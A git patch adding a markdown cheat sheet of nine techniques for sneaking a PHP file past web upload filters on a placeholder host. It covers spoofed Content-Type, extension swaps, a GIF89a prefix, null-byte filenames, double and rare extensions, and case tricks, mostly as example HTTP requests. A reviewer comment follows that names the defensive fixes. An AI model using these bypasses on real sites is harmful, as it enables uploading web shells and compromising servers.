From 50b4a02d539d539da9633a681786aeef37ac99e8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 26 Sep 2020 06:31:06 +0700 Subject: [PATCH] Bypass File Upload [1] Add bypass file upload tips and add 9 tips --- BypassFileUpload.md | 83 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 BypassFileUpload.md diff --git a/BypassFileUpload.md b/BypassFileUpload.md new file mode 100644 index 0000000..57f6bd3 --- /dev/null +++ b/BypassFileUpload.md 
@@ -0,0 +1,83 @@ +# Bypass File Upload +1. Change the ContentType +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` +Change the Content-Type +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/jpeg +``` + +2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" +Content-Type: application/x-php +``` +Change the request to this +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` + +3. Upload the payload, but start with GIF89a; and +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/gif + +GIF89a; +``` +And dont forget to change the content-type to image/gif + +4. Bypass content length validation, it can be bypassed using small payload +``` +() +``` + +5. Using null byte in filename +``` +file.php%00.gif +``` + +6. Using double extensions for the uploaded file +``` +file.jpg.php +``` + +7. Uploading an unpopular php extensions (php4,php5,php6,phtml) +``` +file.php5 +``` + +8. Try to randomly capitalizes the file extension +``` +file.pHP5 +``` + +9. Mix the tips!
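Review bot: Each of the nine items shows a request variation but never states which server-side validation it is meant to get past or what the correct check looks like, so a reader cannot tell when an item applies or how to close it; suggest one line per item naming the weak check it targets (client-supplied Content-Type trusted, extension taken from the last or first dot, case-sensitive extension deny-list, name truncated at a null byte, size check taken as proof of harmlessness) and the fix (allowlist extensions, validate content on the server rather than from the header, normalise case before comparing, rename stored files, and serve uploads from a path that is never executed). Item 4 gives only `()` with no explanation of what is being shown, and item 3's lead sentence ends in a dangling "and"; both need a full sentence. Minor consistency points in the same hunk: the heading of item 1 says `ContentType` while the body says `Content-Type`, and all fences are untagged, so tag the request blocks with `http` so they render as intended.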